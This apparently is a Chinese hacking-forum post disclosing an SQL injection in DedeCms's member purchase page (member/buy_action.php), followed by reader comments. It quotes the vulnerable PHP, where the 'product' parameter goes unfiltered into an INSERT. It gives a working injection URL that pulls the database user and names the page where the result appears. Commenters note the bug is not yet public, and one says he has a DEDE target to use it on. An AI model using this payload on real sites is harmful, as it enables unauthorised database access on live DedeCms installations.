DedeCms 会员中心注入漏洞
member/buy_action.php
require_once(dirname(__FILE__)."/config.php");
CheckRank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once DEDEINC.'/dedetemplate.class.php';
$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->M_ID;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();
省略XX行
if(empty($product))
{
ShowMsg("请选择一个产品!", 'javascript:;');
exit();
}
省略xxx行
=if(!isset($paytype))
{
$inquery = "INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
VALUES ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product没有过滤
";
echo $inquery."<br>" ;注册用户之后验证邮箱完了之后 打开
127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
然后在http://127.0.0.1/dedecms/member/operation.php
就可以查看到返回信息了
关于作者
评论114次
嗯嗯.. 貌似wooyun早就有了~~只是还没公开~~楼主就在这里公开了~
Mark一下。。。
乌云上昨天才提交,没几个人能看见详情,楼主是原创
必须得看看,dede要抽风了。
乌云上有了?是自己发的,还是被转载。。。@Cond0r @t00ls管理团队01
dede又爆了!!!
DEDE基本上都不支持会员注册了
Dede很受伤。谢谢大牛,回头本地测试下
牛呀~~~~~~~~~~~~~~~~~
一月一洞 大爱dede
为什么DEDE老是这样多洞,赶上微软了,一月一洞
dede为何如此脆弱
挺新的版本啊。。。
dede可以跟大牛们合作,正式发布新版本前先给大牛们内测,发现一个洞奖励XXXX
拜condor大牛
dede 真的是非常不安全了
dete這程序 - - 每年都爆這麼多洞
收下 正好有一DEDE感谢
哈哈,dede受重伤,以倒